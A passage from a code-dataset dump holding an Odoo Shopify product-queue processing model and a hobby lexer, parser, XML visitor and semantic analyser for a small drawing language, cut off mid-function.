**attr)\n","repo_name":"peldszus/evidencegraph","sub_path":"src/evidencegraph/evidence_graph.py","file_name":"evidence_graph.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"} +{"seq_id":"74774828679","text":"import json\nimport logging\n\nfrom odoo import models, fields\nfrom .. 
import shopify\n\n_logger = logging.getLogger(\"Shopify\")\n\n\nclass ShopifyProductDataQueueLineEpt(models.Model):\n _name = \"shopify.product.data.queue.line.ept\"\n _description = \"Shopify Product Data Queue Line\"\n\n shopify_instance_id = fields.Many2one(\"shopify.instance.ept\", string=\"Instance\")\n last_process_date = fields.Datetime()\n synced_product_data = fields.Text()\n product_data_id = fields.Char()\n state = fields.Selection([(\"draft\", \"Draft\"), (\"failed\", \"Failed\"), (\"done\", \"Done\"),\n (\"cancel\", \"Cancelled\")],\n default=\"draft\")\n product_data_queue_id = fields.Many2one(\"shopify.product.data.queue.ept\", required=True,\n ondelete=\"cascade\", copy=False)\n common_log_lines_ids = fields.One2many(\"common.log.lines.ept\",\n \"shopify_product_data_queue_line_id\",\n help=\"Log lines created against which line.\")\n name = fields.Char(string=\"Product\", help=\"It contain the name of product\")\n\n def auto_import_product_queue_line_data(self):\n \"\"\"\n This method used to process synced shopify product data in batch of 100 queue lines.\n @author: Maulik Barad on Date 31-Aug-2020.\n \"\"\"\n product_data_queue_obj = self.env[\"shopify.product.data.queue.ept\"]\n ir_model_obj = self.env[\"ir.model\"]\n common_log_book_obj = self.env[\"common.log.book.ept\"]\n\n query = \"\"\"select queue.id\n from shopify_product_data_queue_line_ept as queue_line\n inner join shopify_product_data_queue_ept as queue on queue_line.product_data_queue_id = queue.id\n where queue_line.state='draft' and queue.is_action_require = 'False'\n ORDER BY queue_line.create_date ASC limit 1\"\"\"\n self._cr.execute(query)\n product_data_queue_id = self._cr.fetchone()\n if not product_data_queue_id:\n return\n\n queue = product_data_queue_obj.browse(product_data_queue_id)\n product_data_queue_line_ids = queue.product_data_queue_lines\n\n # For counting the queue crashes and creating schedule activity for the queue.\n queue.queue_process_count += 1\n if queue.queue_process_count > 3:\n queue.is_action_require = True\n note = \"
Need to process this product queue manually. There have been 3 attempts made by the " \
                   "automated action to process this queue. Ignore this note if the queue is already processed.
\"\n queue.message_post(body=note)\n if queue.shopify_instance_id.is_shopify_create_schedule:\n model_id = ir_model_obj.search([(\"model\", \"=\", \"shopify.product.data.queue.ept\")]).id\n common_log_book_obj.create_crash_queue_schedule_activity(queue, model_id, note)\n return\n\n self._cr.commit()\n product_data_queue_line_ids.process_product_queue_line_data()\n return\n\n def process_product_queue_line_data(self):\n \"\"\"\n This method processes product queue lines.\n @author: Maulik Barad on Date 31-Aug-2020.\n \"\"\"\n shopify_product_template_obj = self.env[\"shopify.product.template.ept\"]\n common_log_book_obj = self.env[\"common.log.book.ept\"]\n model_id = common_log_book_obj.log_lines.get_model_id(\"shopify.product.template.ept\")\n\n queue_id = self.product_data_queue_id if len(self.product_data_queue_id) == 1 else False\n\n if queue_id:\n shopify_instance = queue_id.shopify_instance_id\n if not shopify_instance.active:\n _logger.info(\"Instance '{}' is not active.\".format(shopify_instance.name))\n return True\n if queue_id.common_log_book_id:\n log_book_id = queue_id.common_log_book_id\n else:\n log_book_id = common_log_book_obj.create({\"type\": \"import\",\n \"module\": \"shopify_ept\",\n \"shopify_instance_id\": shopify_instance.id,\n \"model_id\": model_id,\n \"active\": True})\n self.env.cr.execute(\n \"\"\"update shopify_product_data_queue_ept set is_process_queue = False where is_process_queue = True\"\"\")\n self._cr.commit()\n commit_count = 0\n for product_queue_line in self:\n commit_count += 1\n if commit_count == 10:\n queue_id.is_process_queue = True\n self._cr.commit()\n commit_count = 0\n # Loop on Products\n shopify_product_template_obj.shopify_sync_products(product_queue_line,\n False,\n shopify_instance,\n log_book_id)\n queue_id.is_process_queue = False\n queue_id.common_log_book_id = log_book_id\n if queue_id.common_log_book_id and not queue_id.common_log_book_id.log_lines:\n queue_id.common_log_book_id.unlink()\n return True\n\n def replace_product_response(self):\n \"\"\"\n This method used to replace the product data response in the failed queue line. 
It will\n call from the product queue line button.\n @author: Haresh Mori @Emipro Technologies Pvt.Ltd on date 21/1/2020.\n \"\"\"\n instance = self.shopify_instance_id\n if not instance.active:\n _logger.info(\"Instance '{}' is not active.\".format(instance.name))\n return True\n instance.connect_in_shopify()\n if not self.product_data_id:\n return True\n result = shopify.Product().find(self.product_data_id)\n result = result.to_dict()\n data = json.dumps(result)\n self.write({\"synced_product_data\": data, \"state\": \"draft\"})\n self._cr.commit()\n self.process_product_queue_line_data()\n return True\n","repo_name":"confclub/odoo","sub_path":"shopify_ept/models/product_data_queue_line.py","file_name":"product_data_queue_line.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"28982860657","text":"from typing import List\n\n\ntokensTable = []\nclass Lexer:\n def __init__(self, transition_table, accepting_states):\n self.transition_table = transition_table\n self.accepting_states = accepting_states\n self.current_state = 0\n self.current_token = ''\n self.tokenTable = [['','']] # define tokenTable attribute here\n\n def currentToken(self, token, state, tokenTable):\n if state == 58:\n tokenTable.append(['VariableDecl', 'LET'])\n return tokenTable\n\n if state == 60:\n #print(tokenTable[-1][0])\n if tokenTable[-1][0] == 'Variable':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['Variable', token])\n return tokenTable\n\n if state == 1 or state == 102:\n if tokenTable[-1][0] == 'ExpVariable':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['ExpVariable', token])\n return tokenTable\n\n if state == 37:\n if tokenTable[-1][0] == 'Integer':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['Integer', token])\n return tokenTable\n\n if state == 2 or state == 8 or state == 4 or state == 5 or state == 6 or state == 7:\n if tokenTable[-1][0] == 'BinaryOp':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['BinaryOp', token])\n return tokenTable\n\n\n\n if state == 39 or state == 40 or state == 41 or state == 42 or state == 43 or state == 44 or state == 45:\n if tokenTable[-1][0] == 'ColourLiteral':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['ColourLiteral', token])\n return tokenTable\n\n if state == 19:\n tokenTable.append(['PadWidth', '__width'])\n return tokenTable\n\n if state == 25:\n tokenTable.append(['PadHeight', '__height'])\n return tokenTable\n\n if state == 49:\n tokenTable.append(['BooleanLiteral', 'True'])\n return tokenTable\n\n if state == 54:\n tokenTable.append(['BooleanLiteral', 'False'])\n return tokenTable\n\n if state == 30:\n tokenTable.append(['PadRandI', '__randi'])\n return tokenTable\n\n if state == 140:\n tokenTable.append(['PadRead', '__read'])\n return tokenTable\n\n if state == 138:\n tokenTable.append(['Comma', ' , '])\n return tokenTable\n\n if token == '(':\n tokenTable.append(['OpenPar', ' ( '])\n return tokenTable\n\n if token == ')':\n tokenTable.append(['ClosePar', ' ) '])\n return tokenTable\n\n if token == '{':\n tokenTable.append(['OpenBlock', ' { '])\n return tokenTable\n\n if token == '}':\n tokenTable.append(['CloseBlock', ' } '])\n return tokenTable\n\n if state == 12:\n tokenTable.append(['Unary', 'Not'])\n return tokenTable\n\n if state == 11:\n tokenTable.append(['Unary', token])\n return 
tokenTable\n\n if state == 87:\n tokenTable.append(['PrintStat', '__print'])\n return tokenTable\n\n if state == 92:\n tokenTable.append(['DelayStat', '__delay'])\n return tokenTable\n\n if state == 97:\n tokenTable.append(['ReturnStat', 'return'])\n return tokenTable\n\n if state == 136:\n tokenTable.append(['PixelStat', '__pixel'])\n return tokenTable\n\n if state == 137 :\n if tokenTable[-1][0] == 'PixelStat':\n tokenTable[-1][1] += token\n return tokenTable\n else:\n tokenTable.append(['PixelStat', token])\n return tokenTable\n\n if state == 125:\n tokenTable.append(['IfStat', ' IF'])\n return tokenTable\n\n if state == 132:\n tokenTable.append(['ElseStat', ' ELSE '])\n return tokenTable\n\n if state == 111:\n tokenTable.append(['ForStat', ' FOR '])\n return tokenTable\n\n if state == 121:\n tokenTable.append(['WhileStat', ' While '])\n return tokenTable\n\n if token == ';':\n tokenTable.append(['SemiCol', ' ; '])\n return tokenTable\n\n if token == ',':\n tokenTable.append(['Comma', ' , '])\n return tokenTable\n\n if state == 100:\n tokenTable.append(['FunctionDecl', ' FUN '])\n return tokenTable\n\n if state == 68:\n tokenTable.append(['Type', ' FLOAT '])\n return tokenTable\n\n if state == 71:\n tokenTable.append(['Type', ' INT '])\n return tokenTable\n\n if state == 74:\n tokenTable.append(['Type', ' BOOL '])\n return tokenTable\n\n if state == 79:\n tokenTable.append(['Type', ' COLOUR '])\n return tokenTable\n return tokenTable\n\n def get_next_token(self, input_string):\n self.current_state = 0\n self.current_token = ''\n self.table = []\n for char in input_string:\n try:\n self.current_state = self.transition_table[(self.current_state, char)]\n self.current_token += char\n self.table.append((char, self.current_state))\n\n #print(f\"Current token: {self.current_token}, current state: {self.current_state}\")\n\n self.tokenTable = self.currentToken(char, self.current_state, self.tokenTable) # pass tokenTable as argument\n\n\n except KeyError:\n return False, self.current_token, self.current_state, self.table\n\n #print(self.tokenTable)\n\n if self.current_state in self.accepting_states:\n print(f\"Valid syntax! Current token: {input_string}, current state: {self.current_state}\")\n\n\n return self.tokenTable\n else:\n print(f\"Invalid syntax! 
Current token: {input_string}, current state: {self.current_state}\")\n #return False, self.current_token, self.current_state, self.table\n\n\n\nclass Parser:\n #def __init__(self, lexer, input_string):\n def __init__(self, tokenTable):\n self.lexer = lexer\n #self.tokenTable = self.lexer.get_next_token(input_string)\n self.tokenTable = tokenTable\n self.current_token_index = 1\n\n\n def error(self, message):\n raise Exception(message)\n\n def parse_selector(self):\n if self.tokenTable[self.current_token_index][0] == 'FunctionDecl':\n return (self.parse_function_decl())\n\n if self.tokenTable[self.current_token_index][0] == 'VariableDecl':\n return(self.parse_variable_decl())\n\n if self.tokenTable[self.current_token_index][0] == 'Variable':\n return(self.parse_variable())\n\n if self.tokenTable[self.current_token_index][0] == 'PrintStat':\n return(self.parse_print())\n\n if self.tokenTable[self.current_token_index][0] == 'DelayStat':\n return(self.parse_delay())\n\n if self.tokenTable[self.current_token_index][0] == 'ReturnStat':\n return(self.parse_return())\n\n if self.tokenTable[self.current_token_index][0] == 'PixelStat':\n return(self.parse_pixel())\n\n if self.tokenTable[self.current_token_index][0] == 'OpenBlock':\n return(self.parse_block())\n\n if self.tokenTable[self.current_token_index][0] == 'WhileStat':\n return(self.parse_while())\n\n if self.tokenTable[self.current_token_index][0] == 'IfStat':\n return(self.parse_ifElse())\n\n\n if self.tokenTable[self.current_token_index][0] == 'ForStat':\n return (self.parse_for())\n\n return {'No choice'}\n\n def parse_sel(self):\n ast = []\n while(self.current_token_index < len(self.tokenTable)-1):\n\n if self.tokenTable[self.current_token_index][0] == 'FunctionDecl':\n ast.append(self.parse_function_decl())\n\n elif self.tokenTable[self.current_token_index][0] == 'VariableDecl':\n ast.append(self.parse_variable_decl())\n\n elif self.tokenTable[self.current_token_index][0] == 'Variable':\n ast.append(self.parse_variable())\n\n elif self.tokenTable[self.current_token_index][0] == 'PrintStat':\n ast.append(self.parse_print())\n\n elif self.tokenTable[self.current_token_index][0] == 'DelayStat':\n ast.append(self.parse_delay())\n\n elif self.tokenTable[self.current_token_index][0] == 'ReturnStat':\n ast.append(self.parse_return())\n\n elif self.tokenTable[self.current_token_index][0] == 'PixelStat':\n ast.append(self.parse_pixel())\n\n elif self.tokenTable[self.current_token_index][0] == 'OpenBlock':\n ast.append(self.parse_block())\n\n elif self.tokenTable[self.current_token_index][0] == 'WhileStat':\n ast.append(self.parse_while())\n\n elif self.tokenTable[self.current_token_index][0] == 'IfStat':\n ast.append(self.parse_ifElse())\n\n elif self.tokenTable[self.current_token_index][0] == 'ForStat':\n ast.append(self.parse_for())\n\n else:\n ast.append({'No choice'})\n\n\n return(ast)\n\n\n #might need to remove useless\n def get_current_token(self):\n return self.tokenTable[self.current_token_index]\n\n def parse_function_decl(self):\n # Expect the next token to be FunctionDecl\n\n if self.tokenTable[self.current_token_index][0] != 'FunctionDecl':\n self.error('Expected FunctionDecl')\n self.current_token_index += 1\n\n # Expect the next token to be the function name\n if self.tokenTable[self.current_token_index][0] != 'ExpVariable':\n self.error('Expected function name')\n func_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n # Expect the next token to be OpenPar\n if 
self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Expected (')\n self.current_token_index += 1\n\n # Parse the function parameters\n params = []\n while True:\n if self.tokenTable[self.current_token_index][0] == 'ClosePar':\n break\n\n if self.tokenTable[self.current_token_index][0] != 'Variable':\n self.error('Expected variable name')\n\n param_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n if self.tokenTable[self.current_token_index][0] != 'Type':\n self.error('Expected parameter type')\n\n param_type = self.tokenTable[self.current_token_index][1]\n params.append((param_name, param_type))\n self.current_token_index += 1\n if self.tokenTable[self.current_token_index][0] != 'Comma' and self.tokenTable[self.current_token_index][\n 0] != 'ClosePar':\n self.error('Expected , or )')\n\n if self.tokenTable[self.current_token_index][0] == 'Comma':\n self.current_token_index += 1\n\n\n self.current_token_index += 1\n return_type = self.tokenTable[self.current_token_index][1]\n if self.tokenTable[self.current_token_index][0] != 'Type':\n self.error('Expected parameter type')\n\n #self.current_token_index += 1\n # Expect the next token to be OpenBrace\n # if self.tokenTable[self.current_token_index][0] != 'OpenBlock':\n # self.error('Expected {')\n\n self.current_token_index += 1\n block = self.parse_block()\n\n #print('func decl', self.tokenTable[self.current_token_index][0])\n # Construct and return the FunctionDecl AST node\n\n info = {'Function name': func_name, 'params': params, 'Return type': return_type, 'Block': block}\n #print('/*-/*-/*-/*-/*-/*-/*/*-/*-/*-/*-',self.current_token_index)\n return {'Function_Decl': info}\n\n def parse_variable_decl(self):\n # Expect the next token to be VariableDecl\n if self.tokenTable[self.current_token_index][0] != 'VariableDecl':\n self.error('Expected VariableDecl')\n self.current_token_index += 1\n\n # Expect the next token to be Variable\n if self.tokenTable[self.current_token_index][0] != 'Variable':\n self.error('Expected variable name')\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n\n # Expect the next token to be Type\n if self.tokenTable[self.current_token_index][0] != 'Type':\n self.error('Expected type')\n var_type = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n\n #self.current_token_index += 1\n # Expect the next token to be SemiColon\n if self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Expected ;')\n self.current_token_index += 1\n\n #print('varibake decl', self.tokenTable[self.current_token_index][0])\n \n\n info ={'name': var_name, 'type': var_type, 'expr': expr}\n return {'Variable_Decl': info}\n\n def parse_expr(self):\n\n left = self.parse_simple_expr()\n\n #self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][1] == '<' or \\\n self.tokenTable[self.current_token_index][1] == '>' or \\\n self.tokenTable[self.current_token_index][1] == '==' or \\\n self.tokenTable[self.current_token_index][1] == '!=' or \\\n self.tokenTable[self.current_token_index][1] == '<=' or \\\n self.tokenTable[self.current_token_index][1] == '>=':\n\n\n\n op = self.tokenTable[self.current_token_index][1]\n\n self.current_token_index += 1\n right = self.parse_simple_expr()\n\n #print('expr', self.tokenTable[self.current_token_index][0])\n return {'Expression Op': op, 'Left Side': left, 'Right Side': right}\n\n else:\n 
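            # No relational operator follows, so the subtree from parse_simple_expr
            # is returned unchanged (recursive-descent operator-precedence layering).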
#print('expr', self.tokenTable[self.current_token_index][0])\n return left\n\n def parse_simple_expr(self):\n\n left = self.parse_term()\n #self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][1] == '+' or\\\n self.tokenTable[self.current_token_index][1] == '-' or \\\n self.tokenTable[self.current_token_index][1] == 'or':\n\n op = self.tokenTable[self.current_token_index][1]\n\n self.current_token_index += 1\n right = self.parse_term()\n #self.current_token_index += 1\n #print('simple expr', self.tokenTable[self.current_token_index][0])\n return {'Expression Op': op, 'Left Side': left, 'Right Side': right}\n\n else:\n #print('simple expr', self.tokenTable[self.current_token_index][0])\n return left\n\n def parse_term(self):\n\n left = self.parse_factor()\n\n #self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][1] == '*' or \\\n self.tokenTable[self.current_token_index][1] == '/' or \\\n self.tokenTable[self.current_token_index][1] == 'and':\n op = self.tokenTable[self.current_token_index][1]\n\n self.current_token_index += 1\n right = self.parse_factor()\n #self.current_token_index += 1\n #print('term', self.tokenTable[self.current_token_index][0])\n return {'Expression Op': op, 'Left Side': left, 'Right Side': right}\n\n else:\n #print('term', self.tokenTable[self.current_token_index][0])\n return left\n\n def parse_factor(self):\n expTable = []\n\n\n if self.tokenTable[self.current_token_index][0] == 'ExpVariable':\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n if self.tokenTable[self.current_token_index][0] == 'OpenPar':\n #function call\n self.current_token_index += 1\n exp = self.parse_expr()\n expTable.append(exp)\n while(self.tokenTable[self.current_token_index][0] == 'Comma'):\n self.current_token_index += 1\n exp = self.parse_expr()\n expTable.append(exp)\n\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return{'FunctionName': var_name, 'Parameters': expTable}\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'ExpVariable': var_name}\n\n if self.tokenTable[self.current_token_index][0] == 'Integer':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'Integer': token}\n\n if self.tokenTable[self.current_token_index][0] == 'BooleanLiteral':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'BooleanLiteral': token}\n\n if self.tokenTable[self.current_token_index][0] == 'ColourLiteral':\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'ColourLiteral': var_name}\n\n if self.tokenTable[self.current_token_index][0] == 'PadWidth':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadWidth': token}\n\n if self.tokenTable[self.current_token_index][0] == 'PadHeight':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadHeight': token}\n\n #PadRead\n if self.tokenTable[self.current_token_index][0] == 'PadRead':\n token = self.tokenTable[self.current_token_index][1]\n 
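            # Grammar: '__read' <Expr> ',' <Expr> -- the two comma-separated
            # coordinate expressions are parsed next.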
self.current_token_index += 1\n firstEx = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'Comma':\n self.error('Expected ,')\n self.current_token_index += 1\n\n secondEx = self.parse_expr()\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadRead': token, 'First expression': firstEx, 'Second Expression': secondEx}\n\n if self.tokenTable[self.current_token_index][0] == 'PadRandI':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n firstEx = self.parse_expr()\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'PadRandI': token, 'Expression': firstEx}\n\n if self.tokenTable[self.current_token_index][0] == 'Unary':\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n firstEx = self.parse_expr()\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'Unary': token, 'Expression': firstEx}\n\n if self.tokenTable[self.current_token_index][0] == 'OpenPar':\n #token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n exp = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Expected )')\n self.current_token_index += 1\n\n #print('factor', self.tokenTable[self.current_token_index][0])\n return {'SubExpr': '( )', 'Expression': exp}\n\n self.error('Expected a Valid Expression')\n\n def parse_variable(self):\n var_name = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n if(self.tokenTable[self.current_token_index][1] == '='):\n self.current_token_index += 1\n #print('variable', self.tokenTable[self.current_token_index-2][1])\n # Parse the expression\n expr = self.parse_expr()\n self.current_token_index += 1\n #print('variable', self.tokenTable[self.current_token_index][0])\n info = {'Name': var_name, 'Expression': expr}\n return {'Variable': info}\n\n def parse_print(self):\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n #print('print', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n info = {'Expression': expr}\n return {'PrintStat': info, }\n\n def parse_delay(self):\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n #print('delay', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n info = {'Expression': expr}\n return {'DelayStat': info}\n\n def parse_return(self):\n self.current_token_index += 1\n\n # Parse the expression\n expr = self.parse_expr()\n #print('return', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n #print('return', self.tokenTable[self.current_token_index][0])\n info = {'Expression': expr}\n return {'ReturnStat': info}\n\n def parse_pixel(self):\n expTable = []\n token = self.tokenTable[self.current_token_index][1]\n self.current_token_index += 1\n\n if token == '__pixelr':\n expr = self.parse_expr()\n expTable.append(expr)\n for i in range(4):\n if self.tokenTable[self.current_token_index][0] != 'Comma':\n self.error('Expected a Valid Expression')\n self.current_token_index += 1\n expr = self.parse_expr()\n expTable.append(expr)\n\n\n if token == '__pixel':\n expr = self.parse_expr()\n expTable.append(expr)\n for i in range(2):\n if self.tokenTable[self.current_token_index][0] != 'Comma':\n self.error('Expected a Valid Expression')\n self.current_token_index += 1\n expr = self.parse_expr()\n expTable.append(expr)\n\n if 
self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Invalid Number Of Expressions')\n #print('Pixel', self.tokenTable[self.current_token_index][0])\n self.current_token_index += 1\n info= {'Type:': token, 'Expressions': expTable}\n return {'Pixel_Statment': info }\n\n\n def parse_block(self):\n #print('BLOCK *-*-*-*--*-*-* BLOCK')\n self.current_token_index += 1\n statTable = []\n\n\n while(True):\n # print('*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-')\n # print(self.tokenTable[self.current_token_index][0])\n # print('*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-')\n #print(len(self.tokenTable))\n\n statement = self.parse_selector()\n #print(self.tokenTable[self.current_token_index][0])\n #print(self.current_token_index)\n statTable.append(statement)\n #print(statTable)\n\n\n\n #and self.current_token_index == len(self.tokenTable)\n if (self.tokenTable[self.current_token_index][0] == 'CloseBlock'):\n if (self.current_token_index == len(self.tokenTable) - 1):\n info = {'Statement': statTable}\n return {'Block': info}\n break\n\n\n\n\n\n self.current_token_index += 1\n info = {'Statement': statTable}\n\n return {'Block': info }\n\n def parse_while(self):\n self.current_token_index += 1\n\n # Parse the expression\n if self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Invalid While loop')\n\n self.current_token_index += 1\n expr = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Invalid While loop')\n\n #self.current_token_index += 1\n #print('->->->_')\n block = self.parse_block()\n\n\n\n #self.current_token_index += 1\n #self.current_token_index += 1\n\n #print('While', self.tokenTable[self.current_token_index][0])\n info = {'Expression': expr, 'Block': block}\n return {'While Stat': info}\n\n def parse_ifElse(self):\n self.current_token_index += 1\n\n # Parse the expression\n if self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Invalid While loop')\n\n self.current_token_index += 1\n expr = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Invalid While loop')\n\n self.current_token_index += 1\n block = self.parse_block()\n #self.current_token_index += 1\n\n\n if self.tokenTable[self.current_token_index][0] == 'ElseStat':\n #self.current_token_index += 1\n #print('IFELSE', self.tokenTable[self.current_token_index][0])\n eBlock = self.parse_block()\n #print('IF+*ELSE', self.tokenTable[self.current_token_index][0])\n #self.current_token_index += 1\n #eInfo = {eBlock}\n info = {'Expression': expr, 'Block': block, 'ELSE_Stat': eBlock}\n return {'IF_Stat': info}\n else:\n #print('IF', self.tokenTable[self.current_token_index][0])\n #self.current_token_index += 1\n info = {'Expression': expr, 'Block': block}\n return {'IF_Stat': info}\n\n def parse_for(self):\n self.current_token_index += 1\n\n # Parse the expression\n if self.tokenTable[self.current_token_index][0] != 'OpenPar':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n varDecl = ''\n\n if self.tokenTable[self.current_token_index][0] == 'VariableDecl':\n varDecl = self.parse_variable_decl()\n\n self.current_token_index -= 1\n\n\n if self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n\n expr = self.parse_expr()\n\n if self.tokenTable[self.current_token_index][0] != 'SemiCol':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n assignment = ''\n if 
self.tokenTable[self.current_token_index][0] == 'ExpVariable':\n assignment = self.parse_variable()\n self.current_token_index -= 1\n\n if self.tokenTable[self.current_token_index][0] != 'ClosePar':\n self.error('Invalid For loop')\n\n self.current_token_index += 1\n\n block = self.parse_block()\n\n info = {'Variable Decl' : varDecl, 'Expression': expr, 'Assignment': assignment, 'Block': block}\n return {'For Stat': info}\n\n\nclass XmlVisitor:\n def __init__(self, ast_dict):\n self.xml = ''\n self.indentation = 0\n self.ast_dict = ast_dict\n\n def visit(self, node):\n if isinstance(node, dict):\n for key, value in node.items():\n #print(key)\n #print(value)\n self.indent()\n self.xml += f\"<{key}>\"\n self.indentation += 1\n self.xml += '\\n'\n self.visit(value)\n self.indent()\n self.xml += f\"\"\n self.xml += '\\n'\n self.indentation -= 1\n elif isinstance(node, list):\n for item in node:\n self.visit(item)\n else:\n self.indent()\n self.xml += str(node)\n self.xml += '\\n'\n\n def indent(self):\n self.xml += ' ' * self.indentation\n\n def write_to_file(self, file_path):\n with open(file_path, 'w') as f:\n f.write(self.xml)\n\n def generate_xml(self):\n self.visit(self.ast_dict)\n return self.xml\n\n\nclass SemanticAnalysis:\n def __init__(self, ast):\n self.ast = ast\n self.symbolTable = [[],[]]\n self.newScope = False\n self.functionTable = []\n\n # to check for duplicate variable declaration\n self.variableDecl()\n\n def error(self, message):\n raise Exception(message)\n def addVariable(self, name, type, location):\n\n #global scope\n for i in self.symbolTable[0]:\n if i[0] == name:\n #already exist\n self.error('Variable ' + i[0] + ' already declared')\n\n if location == 0:\n self.symbolTable[0].append([name, type])\n\n if location == 1:\n if self.newScope == True:\n self.symbolTable[1].append([[name, type]])\n else:\n for i in self.symbolTable[1][-1]:\n if i[0] == name:\n # already exists\n self.error('Variable ' + i[0] + ' already declared')\n self.symbolTable[1][-1].append([name, type])\n\n def getType(self,name,scope):\n for i in self.symbolTable[0]:\n if i[0] == name:\n #already exist\n return i[1]\n if scope == 1:\n if len(self.symbolTable[1]) != 0:\n for i in self.symbolTable[1][-1]:\n if i[0] == name:\n return i[1]\n\n def searchVariable(self, name, scope):\n #global scope\n for i in self.symbolTable[0]:\n if i[0] == name:\n #already exist\n return True\n if scope == 1:\n if len(self.symbolTable[1]) != 0:\n for i in self.symbolTable[1][-1]:\n if i[0] == name:\n return True\n return False\n else:\n return False\n else:\n return False\n def statCheck(self, statement, scope):\n\n if 'Variable' in statement:\n var = statement['Variable']\n self.assignmentCheck(var, scope)\n\n if 'Variable_Decl' in statement:\n var_decl = statement['Variable_Decl']\n self.varDeclCheck(var_decl, scope)\n\n if 'While Stat' in statement:\n whileStat = statement['While Stat']\n self.whileStatCheck(whileStat, scope)\n\n if 'IF_Stat' in statement:\n ifStat = statement['IF_Stat']\n self.ifStatCheck(ifStat,scope)\n\n if 'For Stat' in statement:\n forStat = statement['For Stat']\n self.forStatCheck(forStat,scope)\n\n if 'PrintStat' in statement:\n printStat = statement['PrintStat']\n self.printReturnDelayStatCheck(printStat,scope)\n\n if 'ReturnStat' in statement:\n Stat = statement['ReturnStat']\n self.returnStatCheck(Stat, scope)\n\n\n if 'DelayStat' in statement:\n Stat = statement['DelayStat']\n self.printReturnDelayStatCheck(Stat, scope)\n\n if 'Pixel_Statment' in statement:\n Stat = 
statement['Pixel_Statment']\n self.pixelStatCheck(Stat, scope)\n\n def varDeclCheck(self, Stat, scope):\n find = False\n name = Stat['name']\n type = Stat['type']\n self.addVariable(name, type, scope)\n #print(name,type)\n exp = Stat['expr']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n #8print(array[i])\n if array[i] == 'ExpVariable':\n find = self.searchVariable(array[i+1], scope)\n #print(array[i+1],find)\n if find == False:\n self.error('Variable \"' + array[i+1] + '\" not declared')\n else:\n if self.getType(array[i + 1], scope) != type:\n self.error('Variable \"' + array[i + 1] + '\" do not match the type of ' + name)\n elif array[i] == 'BooleanLiteral':\n #print(type)\n if type != ' BOOL ':\n self.error('Variable \"' + name + '\" does not except boolean')\n elif array[i] == 'ColourLiteral':\n #print(type)\n if type != ' COLOUR ':\n self.error('Variable \"' + name + '\" does not except colour types')\n\n elif array[i] == 'PadWidth':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadHeight':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n elif array[i] == 'PadRandI':\n if type != ' INT ':\n self.error('Variable \"' + name + '\" does not except int types')\n\n\n\n self.newScope = False\n\n def assignmentCheck(self, assigment, scope):\n #find = False\n name = assigment['Name']\n type = self.getType(name, scope)\n find = self.searchVariable(name, scope)\n if find == False:\n self.error('Variable \"' + name + '\" not declared')\n\n exp = assigment['Expression']\n array = self.flatten_dict(exp)\n for i in range(len(array)):\n if array[i] == 'ExpVariable':\n #print(array[i + 